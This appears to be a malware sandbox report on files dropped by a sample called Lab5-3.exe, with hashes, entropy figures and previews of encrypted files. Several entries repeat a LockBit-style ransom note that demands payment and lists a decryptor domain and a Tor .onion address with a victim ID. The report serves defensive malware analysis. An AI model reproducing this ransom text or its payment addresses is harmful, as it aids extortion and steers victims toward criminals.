                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2832
                                                                                                          Entropy (8bit):7.944935111541071
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:qdNhvnpAZjEM3QXnUM5iV3xXjwPJRYS9ioHfUTid3hBaUoSGFcmeykEdEElU92i:8vpAZ5gUjpxXMDTiPGx0uKeY2ElUJ
                                                                                                          MD5:C9D1D7CF1BD375293CA243046D408387
                                                                                                          SHA1:5A49662DD52322C1B3CB144CB11179FE11F0327A
                                                                                                          SHA-256:E081248D37DF50F25809E25779C7B6BD99475104C61E635970207964ECFAB650
                                                                                                          SHA-512:9B4262676EEC53C27258F6358BDB47C3DCF1C9984D8664DA008525A3D87FE1AEE836FF71E702D3DD33BB73B1AC1355E862CA02E4138F7405EBA35D68F614EE7C
                                                                                                          Malicious:false
                                                                                                          Preview:.[.......wl.z....j%|s..=.y.,U.....R .Z.j..z)V.....V.....Nx.......f.H...$...*..-...a.`...$;S.<l.J..'...Y2..^JW-.T.:4.......S.uR..(....?..c..&61...n.8...~t..5..........j+..U?r .....v...ap..|..3"s7.^.....p*MY-.........2W....4........)r%.g...R.o.D.X...e8.?l......O...%.Y.......vF.g.h.....C......X6.d....(..U.O.00. .y..W=......?W..>#... .4.F.S...q.ki.....*.:.E.s.6...e.....].E....q..S\u....K.|.L....|Y&.j..i..[..=.@....v...*....O.M.H.\5..8`U..!xiVd.K...CI...U)..\../3F.b".....Be....bV[9.g..'.zN..x4.b.....&.5Km.a.{.B...1..#![...>.2..1Bg+#.Z.GB...."....VQ..5....P~.H..K..q...k.......ZH<*....)..$.y....z:=.<3.d....O0W.>....@..NM]j.....)l .ZT.?.S....uQ..P.0,.5..Z.t...qP.......p.j....h.`k5./U.@%...-..`...].C.%.v..M..........1...x..5.~F...`...t*....tl/W....>....Zf..Q....~.Z...kj1.[.Y.v(...n....1.......)...`..h..b.:w..8.3...d%.I...#..,..dz.AaeQ>.l...{..V..d...'.9..{$Q...,.".S.a.H..Z$q..a....$.......x.6$f.....);.m.....'d...k...MA...y2..A..h^(.....'mU......v!h...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2800
                                                                                                          Entropy (8bit):7.926191478505142
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:UOgroc55lQ9D7pMgGIQAXjbHfUTid3hBaUoSGFcmeykEdEElU92i:TcApQkoGx0uKeY2ElUJ
                                                                                                          MD5:2A76DF897A86CCD1D89943EABECA95A8
                                                                                                          SHA1:6C0C58414A304A839D6094E8DAF74BC9720E0BFA
                                                                                                          SHA-256:07105A284C4474AB9A76B3C92D5C897B7D38A05795D4CF0FCB5890F0882F69FC
                                                                                                          SHA-512:A53E7B297F7311C341BD52D65E78E4DF70717664AA83080A2D96A036314E039D0A52532EDDC0CE59715F605A61F62DAD23D00480F9A8404125C0055700FCD204
                                                                                                          Malicious:false
                                                                                                          Preview:...8......%.e.K....I...B......0(..X...|4.k..o..L._...B..s.@.&K.eB...&j..k.Z......-.....4,...EJ:-e.@..=S.3.=k..?.(.........l4@K.....K...zV...H....U...YP!6^X.$.'.d...WL|lX"J.Y0....R....:. b...'.XV..V.y.......8_b.3o[..-....$.{...t......w...M.B*M..8m.....y'.N?.[F...hn...l.........f\z..L...K.....oS....L.r..:...y....=.J.Z]?U.2.o.C.p.<.......7.R..zU../f........BJ....9[....O|..._K.$...8....).o.%..y.JgV...[...Ykc.......V.0.<.H.e.}.Q.j.Z}.V.........X.p.........e....E...K.d......w._.......7aC..\n......ab...IH..\...g...k?.........P...N....U...L....E8m.. q..h.zo..cP..J..../..|g ............h.>|..H.B..HHW..1Q.^f..p...7.9..'Hw..N....+.b.Q.K..zJj.....Aj.2;.D..................3... .gDd..*4S0.sx\..%`XI....\......csYd.Z..0.....*$.q....r...9.F$dSQ..@....A.r.H.............2.G....*.j....Bl.Ll..l4.....|._...aH-*..&......=....V..^`.Y.ZmU|. ..&d...?V.!....c@.Eu.ov..y..}.....c......../...K.V......w..l..!b.I..%t.....9U..l...d.4J..!....Y
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2880
                                                                                                          Entropy (8bit):7.937074971789338
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:F+2QxutZmoFaGb35Lw4Sw/D2cVEhI3HfUTid3hBaUoSGFcmeykEdEElU92i:VQxaZgGt0OLkGx0uKeY2ElUJ
                                                                                                          MD5:EB3FEEDAC71AFDD8D44CBC410DCCE584
                                                                                                          SHA1:56F17387DF5667093BA46118B5126D86C5365FD8
                                                                                                          SHA-256:7775DE829604272AE101B09FDBBE65BAFC8D3ABD450A1DDD8F32B86FD0B0F5BC
                                                                                                          SHA-512:2816EA755A6A39C847982F9975403B9C298C7C52BB9CD36D58A5B0E3FC7101C6538E9728C88A971FE306E658C2C33194212DDAA3E45FFF7B21B6AB7A9E88309C
                                                                                                          Malicious:false
                                                                                                          Preview:I.A/%....}.q<.g.p.].h...lRj.V..W.D.D1...).0.@.'..SMUcc`g.O.#....~.sA.........Lh.m#X..-..3y..y.B.jPjW.._.G.h...j.....n|~.~....n..J.....b.e.h>#.]M.[.%..R......y....Y...*..aV.%.).#E/..B>&$..N.3..~..G..D..]..ZDy...c.<.%.&..I.F.....b..v\.;...]..S#.(...@~U.S.qz.].{.s/.9I....2....R0Dp.fv?....C..Kh...o.kK.....$.c.0..^.f.D.d.._.FE..0.y..?.w2......#.+(........0.8..:6..=M.l.G..~.......q,......d~....\c.+.d..R..&..Q...mb..fk}.1.^U9..%.....&.@F...w...B%..].ZX..5.BI...U......D...N..I...Z.w.{.....<y...PGu...b...wV?gZX>*.aX...zA.CG).IQ....1...{..K.."..m.I....<..R.R..}..K9~.....4.d.M....).w.......G.........w.$A~A..d.6O..h..0._.:#w.)...`..I...N./..u..M..j.....^.tD.U4.hAJ..p....h..V.....-....@..."....L..!.g..r.4..LI.../....08.R.;.M....C.............A.e.6..S='*.a..S"....M..N.F......,.~...'..|.ZWAu....._|,.a:....M..c....E.ec..u....!...?.Hv..)...G../..!.x..<(..6..%.pl{....$..i..Sj....`....z...1/.y..8.t.y..Lpn|..QO.....F<.e..l.....+n......,..s'.~..C..Z-..m.7...,
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2672
                                                                                                          Entropy (8bit):7.931195882611491
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:59KXglTmFQQBHIqcyPFjKfuUsOHfUTid3hBaUoSGFcmeykEdEElU92i:uX66F3NsyJnhGx0uKeY2ElUJ
                                                                                                          MD5:0939CFF5A0DD07F72042D19EE5C9D83C
                                                                                                          SHA1:8BB213AC63A3E9BB5B9861567EF9D1E89B3B36FE
                                                                                                          SHA-256:5884F1DE9929E9E90C7E8F906E0BA9A4B11F08C776C2184547D667260F154482
                                                                                                          SHA-512:51FB5D5BCCD33CA7315CA274732206EF8ACC3DE51644947F810F42FD1F8B85954DABBDE7607AFF247F51AAED8D6EBBA6CAF6AC997F160E934523B54EAD168926
                                                                                                          Malicious:false
                                                                                                          Preview:.h.....Tpu.Q.Yr...^]...u..N...!..[.,.4...#.m...........+..GtL.35:..~.%.Yo....Rv...K.....#....A....S%.nw...u.iM.....(...#CB../..h.....E=Q..m..H.S.]...A.R.............t.{....cS....K...C.F.4..Y.^)...Sf4..(>`.:....s..x^,.l.-.._MeKWj...~Q...K.Qc/..9..uj.X..*...-....fb..qD.o.'..H.X|3W.)..0.|LB.......F..*....~...q*%.BB.fK~.W.X..w...@.1...sV.l.@u.5...L[u..r...j...A.zk.6..E..%.......X/}.5...{^..o .5x*..S.<..n.....7.....\.p..2.......q..J....pm.>G...r...2z?..O..a......lS|0W.......\?...py..,<B...V<....h..@...p=w.p.f......(............%.-n#.R....K..................\..7A....oX..eA......{.....e.:..3%..v4...V^Z........S. .yv.....;m.>.....a.6)..X.V.N.....[.>..tU...X...F.:....OC~...3.2?........M`..:.......e....Q..`A.=..?-..0..q..1..] ...nR.!.g..m...W.].X.....>.Y...X..(hC.....xp}...;..3.q..+.T...:........8L..u...i..dE.5...Fl.u..'....`..|......m8u.....C.....^..)......<pc...Q.X.....|ae.&~..[w.^...}.&.....B..dU;....z. .S!.$s....S...z...h..l..<...._;.Vu.V`.....>....I6\.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2976
                                                                                                          Entropy (8bit):7.931327150576611
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:MxCPRMkN9PT6GJuI47U8JbHwhreitHfUTid3hBaUoSGFcmeykEdEElU92i:METZuGsIkU8lQ+Gx0uKeY2ElUJ
                                                                                                          MD5:A7AA9AAFB3F99A5B95FF6DECF6BED008
                                                                                                          SHA1:CC8CB8C2F4E2A99F35C802B57C69978B37333F2E
                                                                                                          SHA-256:BC5B4AF8AA981B5087F32DCF419CA1B5679A0E1CD27B2A487D779BD98524546C
                                                                                                          SHA-512:3B48F10B1B3BD0A803641A67AF9FA1B517F0C8984F08FF1D7DE2A7C3541390FC34EE833AF19F3DBDD8E15E5A8440A69D46C43ED8553F4DCA80E12020C6FF47E0
                                                                                                          Malicious:false
                                                                                                          Preview:..%A..t.U.!=.B..l...3.....q.Q{....f..2.Gd.9,k.0..?.....p.8../..9O2..7....f.i.....X.M..p._._..u'.....h.G......!...$y=l.P.Zk..._......3PM.i..P7.7...+'..D-.9. ...5..C`H.....=*..9b.%^.V/.........a.e..B$w.....Sx.o..nEl.S<...6%.h3.4..}_..u.E...y.G%a....^/.&.?%..~]...sS..$9.o...hC.......T[....+...t.....:,x83O\.*z.a..U....c{..X..y....V.p.nz..}...hEe.p...R2W-......m....UMG..ne...J..K..!..f"5;q..9H...d?...U.PC.....l@=.QW.\.;....n%D.....f...c.~.L....QH......3...l&F.f.r.F....!.q.#5EP...3.5.t........@hw....p.......d..e.Y.Epz...s.]..^........x.3..vo.x...2..|...2..@.......!.N..^u...gO...?.Y....#.N.*.K.Q?.2..!sM..._!,.pHz.j.zXm'E...'.._j..../...j.x.T.....X...4.B.RYK.{&.jU.x.:.x....4.w....s.....9..<qtV.!......4P......wM.A.....o.W..R.Ih..Fb.......U.....Eoe........f..|.0....j....}Z\5...W.._r..\..4.....a...._.pvQ.F.YE.q-..@........:%{./.....C.-._9.F..1p.Q....]I.D;.._....G..7df.6.._...A-......3.i./.....<K.....|..z.<1..;...9.7..8G.P..v.N.mt....?..G.....w..c.d..9c.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2832
                                                                                                          Entropy (8bit):7.937432269260401
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:B43macELQHZBz8ecqfsOIUrSATS3GyXz0HfUTid3hBaUoSGFcmeykEdEElU92i:B43macELQ5BbcAsPA4tXPGx0uKeY2Elk
                                                                                                          MD5:4BD5F541B41A433993AD209B1CD33FFE
                                                                                                          SHA1:9A82B60A938A09D95616FF242879EE7CBF738979
                                                                                                          SHA-256:8DDB0AE65192AAF035D8AF588CBD22C16E0229C57672F17765DB166F13DC3BB0
                                                                                                          SHA-512:3B4CA6B9139E187F79516F956AEFBDCCB14FC69F17D3344C584EED8E3249A3982CC2C53814FCDE40253BD9714569AF9AAF2DAED6AB994D6E8F33CDECADA27A87
                                                                                                          Malicious:false
                                                                                                          Preview:.6.....F...Z.."7....2Y..Q..S.g,.D.gC..q..../Xq\....../.8..."...r.....@.]u ^.2...9...D]O.y...u.<..8elHR.nS...|...E..z..t...I....o.,,.E....*E.$:.....v......,xJr.@......SH.....P..!j.|..C.%?.R..t.8m..T..3...gm...{....e...|......)...'..K..2..1?.l^\......N.Y.;..C.l..X.D.?..&J.Tx.....u....y...;U/.....z...&.......a,..e'i.2X...h9e2.%.d....<..!0....z.q}....I../5?..d-.X....geWVQ....C.......p........9.h.SbBg..7.Z........=..4....NO.&4Z......v.6....(T.j_.T35.wC.......?.%S.;..,wE....A.R......Ul.2%........U3H..@..J.....L[)...n..J..g......B.....gwD.H.......R\:cy...a......O.#......n.g=..|C.f.~.Ituv2.......!V><.v..2.f..[..UZ..P.k.%.................Q..ta.U\....L....5Q..8..P.J..6..\....9^.-...3.U..?.Sr.q&.)..W......+.t.q..D..f...~... .hl.M.a.K.h...n.Z..}|..e.......$x/...4..h....q...M...t@3.:9.)W^..s.8Ha....9...K...`...@.HEx....q.....+.F.<.,h.^V.0.....3E.Z~....v.`.e.QT...O...d_^...P....Hkt. W..NHy&..p-... .X.B....Xb.pe........W.8.......S`....(NG......Z.C...._4.`...GI#/...zg
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2816
                                                                                                          Entropy (8bit):7.938789776810343
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:S2ga1la0eOKp+Z6GrPTfG2gdKrVHfUTid3hBaUoSGFcmeykEdEElU92i:vgaAlp+/TTrruGx0uKeY2ElUJ
                                                                                                          MD5:A022092C11F84C3CD80A5511EB15AB94
                                                                                                          SHA1:5C68D8A0B72757448A31C880336B93D385E6A5F3
                                                                                                          SHA-256:BD08F74E434478B2896F06B530F33D650C8B9864AD320CFAC9BBC72A743EFBAF
                                                                                                          SHA-512:F1A745D5B1EC319CB1CD0322933FD38367075A68545AE2FC1C59B06EBE868444338AF96E330E799810868C354112B0A5A9824FA0004804A178EAF1CE82726646
                                                                                                          Malicious:false
                                                                                                          Preview:...(.$.."3...]..'.>..O..WU.....a....7.(t.D`..vs+$Dm...]m.......'.Y...M.2........)0K.S..,'.4.oVO-.....-V.3.....D8e@.......}K<&.P.#.h).T.\.........)...W.Q.J.*.#g...YY.T.....J...J...I ...L.o.z.....>..L...U.Cp..G.u..XS.].r.F.(6...M`..5...^....:..7.tJ*E7c.hN.e.....\..r.....fWL......c.......I...Q=........|.q...S.zj<i...WJlv.....+y..&.Wv.. ..\. .fw...}.->.Ahs...M<..QZf.)~x.......(\......o..3].F...C\....33.\.0!3Y...tV3..".....d.UI.,.OxA!J..i8p.. .eE.....s...O..`............xT.W....].#~[o.y...U...b-a..n...o..M3.-...d5E.;XMV..q........F......&......F...ZU#..qa.U...L....U#b .7.L.@#Z.Bo.....>..8jF....?....W..pf...r0.>...*.pjk....$.D:.....\m1+...z..'...Ge./@.[JG~....v(K`3...KlY.Y..S..af..bq.`..]......?c3..[89......\HZ$X.6-z.2.J.B..l:sYY. o.q...`,#a..w89'|....5......Y..U2...}j.e.E....4...~A.v_......,=.!..........E.0.[).{.SqY"}...O.;B..8;..@.mo99`....4.j@.g.".S[...7...O.6.*.K.....T.p(,@L..G.)..Sn........$..I.u..*.~..<.....j...x..#:..=.}...'......=.2X
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2464
                                                                                                          Entropy (8bit):7.924155522187255
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:fly0xa5x6KK9nG/ZX/n4lT9ordpJfNsHfUTid3hBaUoSGFcmeykEdEElU92i:f80xgMG/ZPyZSrGx0uKeY2ElUJ
                                                                                                          MD5:CBBBA9E05F2AE5BB50F4CB6905E3002A
                                                                                                          SHA1:2C931E6A0B6B4B188F6FFC17A051214619C2EFA6
                                                                                                          SHA-256:DFFF3226BE1DAA5EA29E31EA831A89E79C5B274A580B1E74C85291796DBFDF42
                                                                                                          SHA-512:B487FB640E399EF7707C6ED52A8EA491B766BA31F164A40A2E48AD0E3ACD68A8C7B78B5E6268E19CE79D0D5C2AABC9EEFD4133C7976F857D7836A88A48F77224
                                                                                                          Malicious:false
                                                                                                          Preview:\.^...z....".6........z9}.. .....I...o:\..VI..9.6..OsY_{.....,.#.H..4$L..|w...+s......r...........'T......bBa. .n.Z..?.1..b...=.s..8...-c.,.X.wx..F..5 ......[...q.x..|I..B2..>..?@...m.@.b...Y.x..........Z.N..HUxd..h_.\..#.x_....H*.3.vIi..6I....M5V6..@.St\.L....\($W>...(.....oA....=..gbr~~1<...(Qw..f..x.y.!R>.^b.../.u..2.h.J......(..g.@Y.,H......%(...37Z....o....&i.~..^.....'.H...m.]^>J..... c........[.5_..)..\+n|..\..PN...v.@.......n?....\.?J..9)K..1~+.h...s.-.^`.O}..U.!Os.,$k|......+...,...S..].t.Y.U...].e..z`R.H.T.".I.5^Z....F..q.....>}P.........c.J......J...N.E..o:r.Vr....E`yL.!..j...f.)...1Z......$P...F..:...z.$.B.........T\..u.<K.N.....Fu.........s....x.R... .M..a.[Qo...;.....F|...9.&.j.60...uO..F....J.B.h.MW&)5.H..9..O....'G4.......T}....*$..?P1.)........p.:....C>3.5..E."..`.;SB.!..\.*........,..........r..LZ0N.:8.~L].`C.W}..s.fs#\.".9.D>.Ba~..PI..q...$......*.H{F...}...z.E...H.....d.x.....4&.....,...7bu.....]._{4k.;+....\.e.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5120
                                                                                                          Entropy (8bit):7.965879066959917
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:X8HzFGPR4DihYl0DfHsqtg7a91c3YZasIPAvgTUhS4VhzaxHy7Gx0uKeY2ElUJ:4z4Pqjlsptg7a91lZoa74ghz9I0Cb
                                                                                                          MD5:A388A7159AC7306CAA63B7574F549A5B
                                                                                                          SHA1:0A61F300DC3F0AD59C8FE672038231EC2DF031FE
                                                                                                          SHA-256:B082902CFA9D1681B4D1622F04CE481567A71713B718950844F20B871C66410B
                                                                                                          SHA-512:8E6AB7E52EEDD0522B68B880C55D34F55E20F215668431DEA92838E73A60E92D491D34D84C7BE582A69F9C4D5B61CF9CA56FE7D0245C148D95BE4A548905FBED
                                                                                                          Malicious:false
